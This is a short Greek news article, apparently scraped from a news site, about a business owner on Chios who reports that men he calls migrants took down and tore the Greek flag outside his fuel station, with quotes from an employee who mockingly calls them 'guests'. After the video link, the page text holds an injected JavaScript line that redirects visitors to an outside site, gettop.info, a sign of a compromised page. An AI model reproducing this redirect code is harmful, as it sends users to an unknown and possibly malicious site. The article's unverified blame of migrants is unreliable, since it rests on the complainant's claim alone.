Χίος: Κατέβασαν και έσκισαν την ελληνική σημαία από επιχείρηση (ΒΙΝΤΕΟ)

0
54

 

Ιδιοκτήτης πρατηρίου υγρών καυσίμων κατήγγειλε πως άγνωστοι, κατά δήλωσή του μετανάστες, κατέβασαν και στη συνέχεια έσκισαν την ελληνική σημαία που είχε αναρτημένη έξω από το κατάστημά του σε περιοχή της Χίου.

Σύμφωνα με το ρεπορτάζ της εφημερίδας, «Πολίτης της Χίου», ο καταγγέλλων προσκόμισε στις Αρχές οπτικό υλικό, όπου φαίνεται αρχικά ένας άνδρας να επιχειρεί να κατεβάσει τη σημαία που βρισκόταν στον ιστό της. Παρά τις προσπάθειές του δεν τα κατάφερε και έτσι στη συνέχεια επέστρεψε στο σημείο με έναν φίλο του, όπου με λίγη προσπάθεια κατάφεραν να την κατεβάσουν και να την πάρουν μαζί τους.

«Το περιμέναμε ότι αυτό θα συμβεί αργά ή γρήγορα. Παραμονή Πρωτοχρονιάς, μία ώρα αφού κλείσαμε, ήρθαν αυτοί οι «φιλοξενούμενοί» μας και έκαναν αυτό που έκαναν», δήλωσε στην εφημερίδα ο υπάλληλος της επιχείρησης, Δημήτρης Λοΐζος.

«Προσπαθούσαν να τη σκίσουν, τελικά την πήρανε και λογικά ή την κάψανε ή την πετάξανε. Γι’ αυτό το σύμβολο έχουν σκοτωθεί τόσοι άνθρωποι και έχει χυθεί τόσο αίμα και φθάσαμε σε αυτό το σημείο», συμπλήρωσε.

https://youtu.be/kX4emKDwivQ setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here